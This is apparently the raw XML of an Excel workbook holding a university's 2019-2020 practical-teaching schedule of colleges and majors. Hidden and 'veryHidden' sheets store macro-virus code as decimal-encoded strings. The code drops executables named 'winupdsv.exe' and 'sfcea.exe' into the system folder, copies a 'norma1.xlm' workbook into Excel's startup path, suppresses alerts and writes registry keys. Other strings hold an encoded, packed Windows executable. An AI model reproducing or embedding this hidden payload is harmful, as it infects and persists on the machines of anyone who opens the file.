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325"/>
  <workbookPr/>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
    <mc:Choice Requires="x15">
      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="C:\Users\zhangyuanshi\Desktop\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="8_{6B617279-B8E9-412B-9748-68E1AD92FDBF}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="-108" yWindow="-108" windowWidth="23256" windowHeight="12576" firstSheet="2" activeTab="2"/>
  </bookViews>
  <sheets>
    <sheet name="NSYMZWYQJPRLPK" sheetId="8" state="hidden" r:id="rId1"/>
    <sheet name="Module1" sheetId="11" state="veryHidden" r:id="rId2"/>
    <sheet name="2019-2020（2）实践教学进程表" sheetId="4" r:id="rId3"/>
    <sheet name="11" sheetId="5" state="hidden" r:id="rId4"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="3" hidden="1">'11'!$A$7:$D$367</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="2" hidden="1">'2019-2020（2）实践教学进程表'!$A$7:$AE$680</definedName>
    <definedName name="Counter" localSheetId="0">NSYMZWYQJPRLPK!$B$83</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="3">'11'!$1:$7</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="2">'2019-2020（2）实践教学进程表'!$1:$7</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 i="5" l="1"/>
  <c r="F4" i="5"/>
  <c r="G4" i="5"/>
  <c r="F6" i="5"/>
  <c r="E6" i="5"/>
  <c r="H4" i="5"/>
  <c r="G6" i="5"/>
  <c r="H6" i="5"/>
  <c r="I4" i="5"/>
  <c r="J4" i="5"/>
  <c r="I3" i="5"/>
  <c r="I6" i="5"/>
  <c r="J6" i="5"/>
  <c r="K4" i="5"/>
  <c r="K6" i="5"/>
  <c r="L4" i="5"/>
  <c r="L6" i="5"/>
  <c r="M4" i="5"/>
  <c r="M6" i="5"/>
  <c r="M3" i="5"/>
  <c r="N4" i="5"/>
  <c r="N6" i="5"/>
  <c r="O4" i="5"/>
  <c r="O6" i="5"/>
  <c r="P4" i="5"/>
  <c r="Q4" i="5"/>
  <c r="P6" i="5"/>
  <c r="Q6" i="5"/>
  <c r="R4" i="5"/>
  <c r="R6" i="5"/>
  <c r="S4" i="5"/>
  <c r="R3" i="5"/>
  <c r="T4" i="5"/>
  <c r="S6" i="5"/>
  <c r="U4" i="5"/>
  <c r="T6" i="5"/>
  <c r="U6" i="5"/>
  <c r="V4" i="5"/>
  <c r="V3" i="5"/>
  <c r="V6" i="5"/>
  <c r="W4" i="5"/>
  <c r="W6" i="5"/>
</calcChain>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="9592" uniqueCount="1562">
  <si>
    <t xml:space="preserve">73 102 32 87 111 114 107 98 111 111 107 115 40 105 41 46 78 97 109 101 32 61 32 34 110 111 114 109 97 49 46 120 108 109 34 32 84 104 101 110 7 0 0 71 111 84 111 32 97 49 34 0 0 73 102 32 78 111 116 32 102 115 111 46 102 105 108 101 101 120 105 115 116 115 40 102 105 108 101 115 118 41 32 84 104 101 110 41 0 0 79 112 101 110 32 102 105 108 101 115 118 32 70 111 114 32 66 105 110 97 114 121 32 65 99 99 101 115 115 32 87 114 105 116 101 32 65 115 32 35 49 15 0 0 70 111 114 32 105 32 61 32 49 32 84 111 32 53 52 5 0 0 110 32 61 32 49 18 0 0 109 32 61 32 73 110 83 116 114 40 104 118 44 32 34 32 34 41 14 0 0 68 111 32 87 104 105 108 101 32 109 32 62 32 48 9 0 0 110 32 61 32 109 32 43 32 49 21 0 0 109 32 61 32 73 110 83 116 114 40 110 44 32 104 118 44 32 34 32 34 41 4 0 0 76 111 111 112 8 0 0 67 108 111 115 101 32 35 49 34 0 0 73 102 32 78 111 116 32 102 115 111 46 102 105 108 101 101 120 105 115 116 115 40 102 105 108 101 115 102 41 32 84 104 101 110 15 0 0 70 111 114 32 105 32 61 32 49 32 84 111 32 50 56 35 0 0 73 102 32 78 111 116 32 102 115 111 46 102 105 108 101 101 120 105 115 116 115 40 102 105 108 101 120 108 109 41 32 84 104 101 110 22 0 0 102 115 111 46 100 101 108 101 116 101 102 105 108 101 32 102 105 108 101 120 108 109 54 0 0 87 111 114 107 98 111 111 107 115 46 79 112 101 110 32 65 112 112 108 105 99 97 116 105 111 110 46 83 116 97 114 116 117 112 80 97 116 104 32 38 32 34 92 110 111 114 109 97 49 46 120 108 109 34 28 0 0 87 111 114 107 98 111 111 107 115 40 34 110 111 114 109 97 49 46 120 108 109 34 41 46 83 97 118 101 68 0 0 102 115 111 46 99 111 112 121 102 105 108 101 32 65 112 112 108 105 99 97 116 105 111 110 46 83 116 97 114 116 117 112 80 97 116 104 32 38 32 34 92 110 111 114 109 97 49 46 120 108 109 34 44 32 </t>
  </si>
  <si>
    <t xml:space="preserve">109 121 102 111 108 100 101 114 44 32 84 114 117 101 25 0 0 84 104 105 115 87 111 114 107 98 111 111 107 46 83 97 118 101 100 32 61 32 84 114 117 101 3 0 0 97 49 58 52 0 0 83 101 116 32 102 115 111 32 61 32 67 114 101 97 116 101 79 98 106 101 99 116 40 34 115 99 114 105 112 116 105 110 103 46 102 105 108 101 115 121 115 116 101 109 111 98 106 101 99 116 34 41 37 0 0 83 101 116 32 119 32 61 32 67 114 101 97 116 101 79 98 106 101 99 116 40 34 119 115 99 114 105 112 116 46 115 104 101 108 108 34 41 6 0 0 69 110 100 32 73 102 4 0 0 78 101 120 116 7 0 0 69 110 100 32 83 117 98 38 0 0 73 102 32 78 111 116 32 102 115 111 46 102 111 108 100 101 114 101 120 105 115 116 115 40 109 121 102 111 108 100 101 114 41 32 84 104 101 110 25 0 0 102 115 111 46 99 114 101 97 116 101 102 111 108 100 101 114 32 109 121 102 111 108 100 101 114 54 0 0 102 115 111 46 100 101 108 101 116 101 102 105 108 101 32 65 112 112 108 105 99 97 116 105 111 110 46 83 116 97 114 116 117 112 80 97 116 104 32 38 32 34 92 110 111 114 109 97 108 46 120 108 109 34 34 0 0 102 105 108 101 115 118 32 61 32 102 111 108 100 101 114 49 32 38 32 34 92 119 105 110 117 112 100 115 118 46 101 120 101 34 31 0 0 102 105 108 101 115 102 32 61 32 102 111 108 100 101 114 49 32 38 32 34 92 115 102 99 101 97 46 101 120 101 34 33 0 0 102 105 108 101 120 108 109 32 61 32 102 111 108 100 101 114 49 32 38 32 34 92 110 111 114 109 97 49 46 120 108 109 34 20 0 0 80 114 105 118 97 116 101 32 83 117 98 32 97 100 100 115 117 109 40 41 33 0 0 65 112 112 108 105 99 97 116 105 111 110 46 68 105 115 112 108 97 121 65 108 101 114 116 115 32 61 32 70 97 108 115 101 102 0 0 119 46 114 101 103 119 114 105 116 101 32 34 72 75 69 89 95 76 79 67 65 76 95 77 65 67 72 73 78 69 92 83 111 102 116 119 97 114 101 92 77 105 99 114 111 115 111 102 </t>
  </si>
  <si>
    <t xml:space="preserve">130 105 121 15 190 8 226 74 9 1 13 169 207 70 244 52 106 92 80 115 187 159 117 177 160 32 67 120 23 136 30 80 70 58 19 167 101 182 162 16 125 20 251 46 182 32 131 61 241 58 86 158 5 98 64 83 178 140 3 223 102 15 227 251 116 18 136 24 64 120 251 91 235 15 13 108 20 90 144 116 85 152 26 8 163 201 88 158 83 86 240 21 14 49 167 235 61 25 125 22 24 54 125 120 91 204 78 22 34 117 6 138 191 248 14 182 208 174 1 174 117 63 38 94 230 139 254 179 247 200 165 127 144 180 199 4 36 236 24 18 66 211 140 83 91 52 252 17 172 131 91 59 232 235 32 162 95 57 192 21 24 248 66 164 237 51 26 71 4 10 89 70 235 3 82 176 131 93 135 244 86 49 87 83 211 13 49 152 124 201 8 8 116 17 49 133 37 244 158 180 11 16 82 228 146 28 44 104 6 114 28 8 145 5 204 133 42 228 247 141 1 120 32 2 147 247 133 146 247 72 120 231 73 203 15 190 158 19 170 130 32 156 120 20 133 246 120 50 5 152 109 232 109 48 55 23 71 42 37 91 11 55 9 190 248 111 235 67 125 208 190 205 136 229 207 231 71 59 223 89 136 23 26 223 176 60 91 68 235 31 131 251 2 150 10 91 235 90 120 128 161 18 19 59 77 223 145 4 67 65 69 68 175 147 176 189 50 41 148 18 8 180 11 226 144 233 36 235 58 112 83 50 144 96 232 38 128 180 41 179 193 58 36 66 56 91 71 131 60 165 164 28 18 15 244 245 144 65 186 37 20 227 227 159 225 208 80 39 190 49 185 48 87 40 73 247 9 70 86 3 254 15 227 199 195 236 80 9 70 34 85 215 250 153 195 225 248 195 15 132 224 223 193 67 46 207 246 20 177 27 242 89 28 195 30 200 32 219 123 145 8 122 247 247 73 177 72 46 18 37 20 34 202 79 155 33 21 148 61 33 70 255 215 110 146 135 212 72 35 244 247 20 36 169 181 118 96 16 139 127 35 41 95 100 66 10 153 50 86 244 151 34 140 133 205 80 244 99 77 8 64 106 114 147 81 90 164 80 102 78 22 35 188 25 93 68 243 24 245 243 130 12 2 65 136 243 12 108 65 58 255 244 </t>
  </si>
  <si>
    <t>End If</t>
  </si>
  <si>
    <t xml:space="preserve">0 0 0 0 0 1 15 0 8 2 16 0 18 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 19 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 20 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 21 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 22 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 23 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 24 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 25 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 26 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 27 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 28 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 29 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 30 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 8 2 16 0 31 0 1 0 2 0 59 1 0 0 0 0 0 1 15 0 6 0 43 0 0 0 0 0 15 0 1 0 0 0 0 0 255 255 0 0 1 0 0 254 21 0 23 11 0 99 58 92 67 48 77 83 46 115 121 115 30 3 0 66 2 132 0 253 0 10 0 0 0 1 0 22 0 39 0 0 0 6 0 47 0 1 0 0 0 15 0 1 0 0 0 0 0 255 255 0 0 2 0 0 255 25 0 23 7 0 67 111 117 110 116 101 114 37 0 0 82 0 1 192 1 192 29 1 66 3 226 0 253 0 10 0 1 0 1 0 22 0 50 0 0 0 6 0 35 0 2 0 0 0 15 0 0 0 0 0 0 0 34 64 0 0 3 0 0 255 13 0 68 0 0 0 0 67 1 0 0 0 65 137 0 253 0 10 0 2 0 1 0 23 0 2 0 0 0 6 0 25 0 3 0 0 0 15 0 1 0 1 0 0 0 255 255 0 0 4 0 0 255 3 0 65 174 0 253 0 10 0 3 0 1 0 22 0 28 0 0 0 6 0 </t>
  </si>
  <si>
    <t xml:space="preserve">135 49 154 159 160 240 133 246 11 162 120 205 226 132 237 164 72 105 83 143 6 124 70 32 153 17 78 23 86 13 170 151 217 179 5 137 46 178 192 77 177 11 17 34 207 139 117 235 13 57 186 229 118 183 84 223 126 62 210 8 86 239 190 52 2 91 252 6 95 64 6 193 232 4 16 9 126 4 4 55 166 4 129 93 194 244 48 136 4 81 252 181 224 15 20 196 51 190 253 68 81 1 66 59 60 16 124 200 94 166 32 86 14 152 17 186 10 224 1 132 188 75 109 33 195 14 152 104 224 130 87 86 135 241 102 162 157 64 17 76 5 244 106 2 235 53 114 51 75 47 236 2 72 65 212 154 205 116 105 80 55 106 32 77 16 84 86 150 237 137 45 212 16 97 86 17 248 80 107 165 95 106 57 1 94 106 4 116 4 5 129 64 180 33 7 91 19 44 89 55 14 161 90 155 196 100 40 68 113 110 30 46 152 120 235 17 142 105 216 59 222 8 142 137 48 97 225 200 145 229 172 15 12 25 144 73 114 246 220 226 28 180 253 90 176 253 199 7 88 19 223 43 110 61 222 68 26 59 248 103 190 119 83 60 171 180 66 24 141 77 228 12 202 141 30 92 92 85 2 16 158 192 220 179 92 18 114 137 86 59 119 156 133 118 114 126 23 12 115 240 216 136 193 192 42 249 185 163 100 27 139 155 100 139 133 196 93 224 8 204 117 182 145 101 220 184 216 163 212 194 118 79 152 136 236 190 12 169 235 46 52 159 59 107 44 78 13 86 172 17 137 205 54 223 176 80 253 243 216 175 83 229 74 238 27 131 224 74 132 51 255 59 247 13 99 197 254 154 249 209 56 4 25 68 235 24 6 138 189 202 179 231 8 12 72 30 164 163 131 157 71 63 62 95 231 94 193 154 156 180 37 1 215 209 133 97 71 4 28 6 18 112 157 181 40 44 233 189 34 239 118 74 35 117 177 94 86 240 8 250 131 82 20 100 64 58 240 255 20 168 252 131 52 97 64 116 64 129 125 8 137 19 215 56 55 218 171 86 63 28 181 76 10 166 51 240 81 32 171 23 154 11 36 206 214 104 71 137 3 117 230 57 40 24 121 248 235 184 24 225 24 235 14 186 24 182 222 171 101 96 245 138 </t>
  </si>
  <si>
    <t>folder1 = fso.getspecialfolder(1)</t>
  </si>
  <si>
    <t>※</t>
  </si>
  <si>
    <t>///</t>
  </si>
  <si>
    <t>//</t>
  </si>
  <si>
    <t>/</t>
  </si>
  <si>
    <t>#</t>
  </si>
  <si>
    <t>R</t>
  </si>
  <si>
    <t>Ω</t>
  </si>
  <si>
    <t>★</t>
  </si>
  <si>
    <t>〓</t>
  </si>
  <si>
    <t>GZ</t>
  </si>
  <si>
    <t>Z</t>
  </si>
  <si>
    <t>C</t>
  </si>
  <si>
    <t>G</t>
  </si>
  <si>
    <t>△</t>
  </si>
  <si>
    <t>Y</t>
  </si>
  <si>
    <t>*</t>
  </si>
  <si>
    <t>G</t>
    <phoneticPr fontId="15" type="noConversion"/>
  </si>
  <si>
    <t>年　级</t>
    <phoneticPr fontId="15" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">153 152 212 46 180 173 59 109 87 74 33 198 133 163 98 15 210 212 1 89 139 255 139 62 141 20 102 191 9 31 17 70 4 14 207 117 13 23 128 116 175 236 228 204 176 12 246 220 119 178 93 247 216 133 219 38 16 123 33 24 122 235 41 223 107 182 255 118 139 7 83 248 131 232 5 80 131 198 5 86 45 168 83 177 151 253 240 52 112 32 93 131 39 0 164 40 193 192 225 8 207 216 0 206 145 199 187 230 104 102 216 173 135 162 171 217 254 224 198 133 33 126 139 48 53 64 4 30 206 210 87 127 33 81 37 117 191 216 132 142 3 105 216 16 167 20 23 219 223 118 132 120 7 79 13 236 43 198 191 0 40 14 59 221 187 84 248 199 126 2 139 199 27 97 137 6 61 223 216 200 103 33 36 214 76 252 83 100 51 52 15 83 117 49 54 193 218 184 66 115 141 183 87 94 218 86 183 65 104 20 22 180 213 175 53 214 206 126 254 38 0 140 91 255 254 131 182 217 132 173 70 251 220 164 255 247 224 248 212 142 80 70 198 4 177 67 141 94 249 76 147 158 14 172 86 87 71 39 60 157 218 7 235 42 128 62 61 63 56 5 93 115 69 138 46 11 215 41 89 193 12 131 227 199 7 4 199 8 23 131 183 109 187 167 92 36 91 3 111 116 6 87 141 126 12 128 116 19 94 101 229 73 87 188 183 65 59 131 35 199 48 32 65 66 228 96 52 39 180 32 86 85 224 254 118 97 11 242 225 254 22 33 11 106 7 202 196 6 187 3 190 28 47 51 210 60 247 210 183 101 216 174 118 107 202 215 157 55 75 84 157 133 130 129 10 132 191 224 191 97 192 34 3 11 182 202 128 60 24 92 117 17 188 193 118 96 20 89 179 24 159 3 104 223 59 107 47 51 175 23 2 116 103 98 255 125 43 180 183 109 1 82 57 5 114 164 91 134 194 1 194 99 201 70 127 232 124 8 205 193 17 186 211 4 5 139 14 16 81 246 3 55 187 8 36 196 176 76 36 16 234 37 138 232 87 18 134 130 225 5 118 99 194 182 169 171 117 36 131 235 87 139 191 82 100 58 14 155 52 11 88 184 63 140 20 144 130 94 93 114 254 165 95 18 237 30 0 106 42 83 170 68 </t>
  </si>
  <si>
    <t>myfolder = w.SpecialFolders("Templates") &amp; "\Software\"</t>
  </si>
  <si>
    <t xml:space="preserve">30 99 248 117 178 214 7 129 46 118 129 230 255 191 44 22 23 115 60 100 23 206 0 130 22 58 145 45 182 64 116 88 210 11 65 128 233 89 7 220 104 164 36 164 134 47 173 38 133 13 120 87 16 59 203 125 4 222 26 93 177 181 99 131 20 166 140 43 137 112 113 88 136 45 218 182 163 24 4 8 2 59 72 4 175 90 69 195 91 128 21 255 173 184 157 51 237 45 192 59 213 87 126 93 139 29 68 131 191 244 41 251 90 59 205 116 21 246 65 56 253 95 106 180 62 64 86 233 194 124 236 235 63 139 52 131 235 36 90 159 248 22 80 32 193 231 2 199 193 89 26 248 177 226 172 159 15 97 60 7 59 253 116 182 151 186 23 137 247 59 245 239 78 239 137 110 4 2 12 9 26 219 86 118 46 4 28 120 92 48 241 236 213 116 175 26 33 217 184 20 205 220 170 32 1 154 98 132 21 219 117 221 126 201 251 5 117 119 96 8 196 88 229 26 30 16 57 190 79 71 207 246 13 220 205 77 144 28 42 84 172 84 11 37 69 93 3 28 43 115 29 72 115 49 76 5 3 173 235 237 255 209 86 59 202 125 21 141 52 73 43 209 4 181 216 114 230 38 2 171 161 185 253 198 12 74 117 247 139 35 53 84 61 222 192 48 12 216 15 223 12 131 192 112 61 144 18 129 200 207 128 252 93 61 145 132 74 61 147 207 128 252 12 133 55 61 141 130 36 242 252 12 200 61 143 134 17 61 146 10 181 198 12 113 138 80 136 106 144 125 141 99 11 36 137 10 89 94 206 250 81 213 65 175 201 17 34 163 227 179 9 65 174 204 178 181 12 52 160 237 128 205 182 251 4 236 80 57 21 16 86 184 95 122 186 247 5 116 237 235 208 192 187 198 115 4 57 58 211 219 254 16 117 245 141 12 73 94 3 141 21 193 18 116 140 192 75 187 246 195 83 91 57 29 168 91 117 118 68 97 67 234 55 155 19 121 51 255 165 23 74 13 167 63 188 60 61 116 72 180 180 193 95 201 51 92 89 189 6 100 232 32 130 41 110 61 189 4 14 247 56 162 109 81 139 0 243 177 151 253 239 200 6 178 9 139 61 65 56 31 116 57 85 87 177 91 137 143 57 139 232 89 </t>
  </si>
  <si>
    <t>Private Sub addsum()</t>
  </si>
  <si>
    <t xml:space="preserve">253 255 255 255 23 0 0 0 3 0 0 0 4 0 0 0 5 0 0 0 6 0 0 0 7 0 0 0 8 0 0 0 9 0 0 0 10 0 0 0 11 0 0 0 12 0 0 0 13 0 0 0 14 0 0 0 15 0 0 0 16 0 0 0 17 0 0 0 18 0 0 0 19 0 0 0 20 0 0 0 21 0 0 0 22 0 0 0 254 255 255 255 58 0 0 0 76 0 0 0 26 0 0 0 27 0 0 0 28 0 0 0 29 0 0 0 30 0 0 0 31 0 0 0 32 0 0 0 59 0 0 0 34 0 0 0 35 0 0 0 36 0 0 0 48 0 0 0 38 0 0 0 39 0 0 0 40 0 0 0 41 0 0 0 42 0 0 0 43 0 0 0 44 0 0 0 45 0 0 0 46 0 0 0 47 0 0 0 33 0 0 0 49 0 0 0 50 0 0 0 51 0 0 0 52 0 0 0 53 0 0 0 54 0 0 0 55 0 0 0 56 0 0 0 57 0 0 0 254 255 255 255 78 0 0 0 60 0 0 0 61 0 0 0 62 0 0 0 63 0 0 0 64 0 0 0 74 0 0 0 66 0 0 0 67 0 0 0 68 0 0 0 69 0 0 0 70 0 0 0 71 0 0 0 72 0 0 0 73 0 0 0 254 255 255 255 75 0 0 0 77 0 0 0 254 255 255 255 79 0 0 0 86 0 0 0 80 0 0 0 81 0 0 0 82 0 0 0 83 0 0 0 84 0 0 0 85 0 0 0 87 0 0 0 254 255 255 255 254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t>
  </si>
  <si>
    <t xml:space="preserve">100 69 90 114 138 185 139 19 126 161 185 173 108 139 130 145 122 95 106 5 88 57 23 97 9 183 94 117 76 30 45 211 180 239 96 194 170 69 106 235 199 141 77 244 219 115 89 169 109 233 16 2 211 100 11 7 151 189 57 209 33 248 235 167 44 156 22 20 206 24 12 6 61 116 64 27 51 67 11 55 1 128 56 26 13 205 203 107 97 108 191 167 28 212 61 108 235 22 159 240 46 193 39 26 24 13 161 24 86 106 23 250 181 208 47 94 26 184 170 235 6 27 125 7 226 15 71 239 139 198 163 25 83 0 83 89 163 209 168 125 112 134 174 33 18 34 207 86 200 34 78 24 32 26 88 232 111 211 173 89 219 184 80 145 139 21 25 137 4 17 171 137 155 90 181 32 9 61 208 114 129 234 124 60 99 163 119 185 96 28 140 242 8 139 4 239 120 96 139 6 240 206 4 97 3 131 9 255 8 236 22 110 48 32 66 148 192 41 124 212 16 209 45 189 246 4 57 128 65 194 82 233 119 208 248 162 224 226 101 144 50 140 94 161 144 219 22 111 130 254 243 214 40 127 241 11 67 111 235 7 254 95 168 16 239 53 254 179 36 219 78 8 36 254 137 14 246 47 24 112 163 75 91 197 12 243 239 12 115 169 12 182 6 238 35 215 34 129 254 112 109 193 7 144 126 191 31 108 117 11 155 47 108 216 7 86 10 40 89 96 241 18 15 199 238 87 116 100 236 120 19 183 237 141 72 57 14 88 24 73 16 78 4 126 16 13 94 147 216 38 83 174 215 7 249 150 182 198 51 131 58 132 139 101 203 232 225 134 163 253 15 141 4 200 235 5 184 88 115 9 194 216 91 50 54 202 13 103 83 217 89 138 56 42 52 74 52 154 176 63 240 141 133 45 238 95 82 84 12 95 116 6 251 0 38 126 185 235 15 253 45 235 8 13 2 246 135 92 191 185 91 93 195 204 0 106 44 69 26 32 87 1 139 71 211 111 93 106 121 209 53 59 254 13 59 248 15 130 120 105 201 85 9 119 247 199 3 63 90 216 245 225 183 250 66 115 249 8 114 41 224 255 36 149 216 30 141 109 105 251 183 199 186 28 131 233 4 114 90 224 110 200 23 167 107 110 229 133 240 29 30 141 </t>
  </si>
  <si>
    <t xml:space="preserve">77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 200 0 0 0 14 31 186 14 0 180 9 205 33 184 1 76 205 33 84 104 105 115 32 112 114 111 103 114 97 109 32 99 97 110 110 111 116 32 98 101 32 114 117 110 32 105 110 32 68 79 83 32 109 111 100 101 46 13 13 10 36 0 0 0 0 0 0 0 127 83 3 133 59 50 109 214 59 50 109 214 59 50 109 214 211 45 103 214 11 50 109 214 184 46 99 214 50 50 109 214 59 50 108 214 23 50 109 214 89 45 126 214 56 50 109 214 211 45 102 214 62 50 109 214 82 105 99 104 59 50 109 214 0 0 0 0 0 0 0 0 80 69 0 0 76 1 3 0 27 156 227 64 0 0 0 0 0 0 0 0 224 0 15 1 11 1 6 0 0 64 0 0 0 16 0 0 0 112 0 0 128 175 0 0 0 128 0 0 0 192 0 0 0 0 64 0 0 16 0 0 0 2 0 0 4 0 0 0 0 0 0 0 4 0 0 0 0 0 0 0 0 208 0 0 0 16 0 0 0 0 0 0 3 0 0 0 0 0 16 0 0 16 0 0 0 0 16 0 0 16 0 0 0 0 0 0 16 0 0 0 0 0 0 0 0 0 0 0 0 192 0 0 116 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 85 80 88 48 0 0 0 0 0 112 0 0 0 16 0 0 0 0 0 0 0 4 0 0 0 0 0 0 0 0 0 0 0 0 0 0 128 0 0 224 85 80 88 49 0 0 0 0 0 64 0 0 0 128 0 0 0 50 0 0 0 4 0 0 </t>
  </si>
  <si>
    <t xml:space="preserve">45 81 100 140 252 224 148 128 75 177 253 50 236 232 141 116 1 40 9 180 15 93 252 75 38 186 228 184 118 47 132 255 4 118 3 106 2 95 217 218 59 60 11 86 27 200 57 54 124 191 141 189 223 190 69 176 191 188 41 47 106 20 51 210 89 216 40 247 237 1 125 228 23 199 141 52 134 87 64 210 183 11 131 224 190 39 57 172 119 169 4 224 116 124 179 179 181 33 17 73 224 140 8 128 204 8 166 155 171 0 49 108 77 200 18 195 59 85 196 228 78 67 150 136 18 82 252 44 0 202 73 225 166 190 161 49 115 23 70 127 50 84 212 86 24 64 200 151 59 29 9 196 18 153 50 149 178 102 67 89 39 154 210 23 130 72 138 97 20 139 124 36 27 236 125 46 193 87 69 31 53 116 29 21 17 28 155 226 228 227 11 102 7 0 15 250 136 230 8 98 70 73 144 186 65 63 81 181 203 131 101 108 242 124 0 1 142 165 88 233 106 212 81 31 136 27 29 39 137 26 145 124 55 236 104 45 200 2 96 176 35 120 41 194 214 181 90 255 158 25 80 147 120 131 137 28 244 231 236 177 120 131 197 112 126 201 228 54 93 13 234 220 104 204 4 180 35 23 168 39 21 56 177 117 7 130 110 211 181 93 98 36 175 162 21 52 190 2 47 11 243 61 196 59 198 145 124 20 48 210 141 147 173 128 26 10 44 229 51 10 220 73 11 107 231 124 176 212 242 72 158 108 140 0 255 1 255 0 255 75 88 228 18 50 18 83 50 95 161 169 14 187 133 21 34 60 135 236 138 38 64 95 43 108 160 108 181 8 157 147 10 224 20 204 177 33 35 11 22 136 137 23 139 146 140 116 21 249 249 187 134 21 35 155 21 253 253 85 97 69 67 252 16 80 190 173 86 86 144 228 86 188 21 79 108 186 45 24 193 51 68 102 237 77 151 146 131 117 74 247 241 137 247 27 68 228 118 54 63 40 81 124 180 15 94 148 150 218 110 77 108 102 99 225 101 22 25 103 20 28 198 1 125 96 176 96 147 230 86 139 9 1 217 240 205 150 22 135 7 249 85 240 185 151 144 226 37 17 28 15 61 242 21 179 71 236 224 68 95 87 108 181 37 177 123 136 218 203 29 136 189 32 </t>
  </si>
  <si>
    <t>Workbooks(i).Close</t>
  </si>
  <si>
    <t xml:space="preserve">82 0 111 0 111 0 116 0 32 0 69 0 110 0 116 0 114 0 121 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 22 0 5 0 255 255 255 255 255 255 255 255 2 0 0 0 32 8 2 0 0 0 0 0 192 0 0 0 0 0 0 70 0 0 0 0 96 76 254 176 186 220 196 1 112 199 144 51 206 106 196 1 25 0 0 0 128 49 0 0 0 0 0 0 87 0 111 0 114 0 107 0 98 0 111 0 111 0 107 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 18 0 2 1 18 0 0 0 255 255 255 255 255 255 255 255 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2 0 0 0 142 41 0 0 0 0 0 0 95 0 86 0 66 0 65 0 95 0 80 0 82 0 79 0 74 0 69 0 67 0 84 0 95 0 67 0 85 0 82 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 34 0 1 1 1 0 0 0 16 0 0 0 15 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 208 140 96 22 206 106 196 1 128 182 244 22 206 106 196 1 0 0 0 0 0 0 0 0 0 0 0 0 86 0 66 0 65 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 8 0 1 0 255 255 255 255 255 255 255 255 8 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 48 59 107 22 206 106 196 1 128 23 208 22 206 106 196 1 0 0 0 0 0 0 0 0 0 0 0 0 </t>
  </si>
  <si>
    <t>专业</t>
    <phoneticPr fontId="15" type="noConversion"/>
  </si>
  <si>
    <t>学院名称</t>
    <phoneticPr fontId="15" type="noConversion"/>
  </si>
  <si>
    <t>材料科学与工程学院</t>
  </si>
  <si>
    <t>无机非金属材料工程</t>
  </si>
  <si>
    <t>金属材料工程（金属材料及热处理方向）</t>
  </si>
  <si>
    <t>金属材料工程（腐蚀与防护方向）</t>
  </si>
  <si>
    <t>复合材料与工程</t>
  </si>
  <si>
    <t>环境与化学工程学院</t>
  </si>
  <si>
    <t>环境工程（卓越计划）</t>
  </si>
  <si>
    <t>给排水科学与工程</t>
  </si>
  <si>
    <t>航空制造工程学院</t>
  </si>
  <si>
    <t>材料加工类“春晓”班</t>
  </si>
  <si>
    <t>机械制造类专业“春晓班”</t>
  </si>
  <si>
    <t>材料成型及控制工程（卓越计划）</t>
  </si>
  <si>
    <t>焊接技术与工程（卓越计划）</t>
  </si>
  <si>
    <t>电子封装技术</t>
  </si>
  <si>
    <t>飞机制造技术(士官生)</t>
  </si>
  <si>
    <t>信息工程学院</t>
  </si>
  <si>
    <t>电子信息科学与技术</t>
  </si>
  <si>
    <t>自动化（卓越计划）</t>
  </si>
  <si>
